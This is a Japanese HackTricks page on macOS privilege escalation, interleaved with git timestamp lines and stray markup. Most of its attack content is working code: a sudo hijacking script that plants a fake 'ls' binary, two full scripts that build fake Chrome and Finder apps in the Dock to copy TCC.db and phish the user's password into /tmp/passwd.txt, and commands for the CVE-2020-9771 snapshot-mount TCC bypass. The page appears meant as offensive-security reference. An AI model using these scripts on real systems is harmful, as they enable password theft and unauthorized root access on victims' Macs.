2023-12-26 02:42:22 +00:00
# macOS 権限昇格
2023-12-20 02:39:21 +00:00
< details >
2024-01-04 14:22:53 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をご覧ください!< / strong > < / summary >
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
2023-12-20 02:39:21 +00:00
< / details >
2023-12-26 02:42:22 +00:00
## TCC 権限昇格
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
TCC権限昇格を探している場合は、以下をご覧ください:
2023-12-20 02:39:21 +00:00
{% content-ref url="macos-security-protections/macos-tcc/" %}
[macos-tcc ](macos-security-protections/macos-tcc/ )
{% endcontent-ref %}
## Linux Privesc
2024-01-04 14:22:53 +00:00
**Linux/Unixに影響を与える権限昇格に関するほとんどのトリックは、MacOSマシンにも影響を与える**ことに注意してください。したがって、以下を参照してください:
2023-12-20 02:39:21 +00:00
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation ](../../linux-hardening/privilege-escalation/ )
{% endcontent-ref %}
2023-12-26 02:42:22 +00:00
## ユーザーインタラクション
2023-12-20 02:39:21 +00:00
2023-12-26 02:42:22 +00:00
### Sudo Hijacking
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
元の[Sudo HijackingテクニックはLinux権限昇格の投稿の中にあります](../../linux-hardening/privilege-escalation/#sudo-hijacking)。
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
しかし、macOSはユーザーが**`sudo`**を実行するときに**`PATH`**を**維持**します。つまり、この攻撃を達成する別の方法は、被害者が**sudoを実行するときに実行する他のバイナリをハイジャックする**ことです。
2023-12-20 02:39:21 +00:00
```bash
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls < < EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls
# victim
sudo ls
```
2023-12-26 02:42:22 +00:00
ターミナルを使用するユーザーは、高い確率で**Homebrewがインストールされている**ことに注意してください。したがって、**`/opt/homebrew/bin`**内のバイナリをハイジャックすることが可能です。
2023-12-20 02:39:21 +00:00
2023-12-26 02:42:22 +00:00
### Dock のなりすまし
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
**ソーシャルエンジニアリング**を使用して、たとえばドック内の Google Chrome を**なりすまし**、実際には自分のスクリプトを実行することができます:
2023-12-20 02:39:21 +00:00
{% tabs %}
2023-12-26 02:42:22 +00:00
{% tab title="Chrome のなりすまし" %}
いくつかの提案:
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
* Dock で Chrome があるかを確認し、その場合はそのエントリを**削除**し、Dock 配列の同じ位置に**偽の** **Chrome エントリを追加**します。
2023-12-20 02:39:21 +00:00
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c < < EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat < < EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CFBundleExecutable< / key >
< string > Google Chrome< / string >
< key > CFBundleIdentifier< / key >
< string > com.google.Chrome< / string >
< key > CFBundleName< / key >
< string > Google Chrome< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
< / dict >
< / plist >
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Google Chrome.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
sleep 0.1
killall Dock
```
2023-12-26 02:42:22 +00:00
{% endtab %}
2024-01-04 14:22:53 +00:00
{% tab title="Finderのなりすまし" %}
2023-12-20 02:39:21 +00:00
いくつかの提案:
2023-12-26 02:42:22 +00:00
* **DockからFinderを削除することはできません**ので、Dockに追加する場合は、偽のFinderを本物の隣に置くことができます。これには、**Dock配列の始めに偽のFinderエントリを追加する必要があります**。
* 別の選択肢として、Dockに置かずに開くだけでも、「FinderがFinderの制御を求めている」はそれほど奇妙ではありません。
2024-01-04 14:22:53 +00:00
* パスワードを聞かずにrootに**昇格する**別の方法は、Finderに実際にパスワードを求めて特権アクションを実行させることです:
* Finderに**`/etc/pam.d`** に新しい ** `sudo` ** ファイルをコピーさせる( パスワードを求めるプロンプトは「Finderがsudoのコピーを望んでいる」と表示されます)
* Finderに新しい**Authorization Plugin**をコピーさせる( ファイル名を制御できるので、パスワードを求めるプロンプトは「FinderがFinder.bundleのコピーを望んでいる」と表示されます)
2023-12-20 02:39:21 +00:00
```bash
#!/bin/sh
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
rm -rf /tmp/Finder.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources
# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c < < EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
# Info.plist
cat < < EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CFBundleExecutable< / key >
< string > Finder< / string >
< key > CFBundleIdentifier< / key >
< string > com.apple.finder< / string >
< key > CFBundleName< / key >
< string > Finder< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
< / dict >
< / plist >
EOF
# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Finder.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
sleep 0.1
killall Dock
```
{% endtab %}
{% endtabs %}
2023-12-26 02:42:22 +00:00
## TCC - ルート権限昇格
2023-12-20 02:39:21 +00:00
2023-12-26 02:42:22 +00:00
### CVE-2020-9771 - mount\_apfs TCCバイパスと権限昇格
2023-12-20 02:39:21 +00:00
2023-12-26 02:42:22 +00:00
**任意のユーザー**(権限のないユーザーも含む)は、タイムマシンのスナップショットを作成し、マウントして、そのスナップショットの**すべてのファイルにアクセス**することができます。
2024-01-04 14:22:53 +00:00
**唯一必要な権限**は、使用されるアプリケーション(例えば`Terminal`)が**フルディスクアクセス**( FDA) 権限( `kTCCServiceSystemPolicyAllfiles`)を持っていることで、これは管理者によって付与される必要があります。
2023-12-20 02:39:21 +00:00
{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
```
2023-12-26 02:42:22 +00:00
```markdown
2023-12-20 02:39:21 +00:00
{% endcode %}
2023-12-26 02:42:22 +00:00
より詳細な説明は[**元のレポートで見ることができます**](https://theevilbit.github.io/posts/cve_2020_9771/)**。**
2023-12-20 02:39:21 +00:00
## 機密情報
2023-12-26 02:42:22 +00:00
これは権限昇格に役立つ可能性があります:
2023-12-20 02:39:21 +00:00
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md ](macos-files-folders-and-binaries/macos-sensitive-locations.md )
{% endcontent-ref %}
< details >
2024-01-04 14:22:53 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)で< strong > AWSハッキングをゼロからヒーローに学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
HackTricksをサポートする他の方法:
2023-12-20 02:39:21 +00:00
2024-01-04 14:22:53 +00:00
* **HackTricksにあなたの**会社を広告したい**、または**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を手に入れましょう
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックしてください
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**telegramグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローしてください。**
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**
2023-12-20 02:39:21 +00:00
< / details >
2023-12-26 02:42:22 +00:00
```